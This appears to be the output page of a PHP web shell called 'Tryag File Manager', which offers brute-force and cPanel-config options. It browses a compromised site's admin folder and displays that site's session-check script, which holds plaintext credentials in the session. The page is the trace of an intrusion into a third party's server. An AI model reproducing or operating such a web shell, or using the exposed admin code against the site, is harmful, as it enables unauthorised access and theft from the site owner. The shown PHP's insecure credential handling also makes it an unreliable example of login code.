Tryag File Manager
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
home
/
thebestprx
/
public_html
/
admin
/
include
/
Or
Select Your Path :
Upload File :
New :
File
Dir
/home/thebestprx/public_html/admin/include/chksession.php
<? @session_start(); include_once("wb_config.php"); $sess_sessid = $_SESSION[sess_userid]; $sess_user = $_SESSION[sess_user]; $sess_pass = $_SESSION[sess_pass]; if($sess_user !=$userlogin_name || $sess_pass != $passlogin_name) { echo "<meta http-equiv=\"refresh\" content=\"0;URL=../index.php\" />"; exit(); } ?>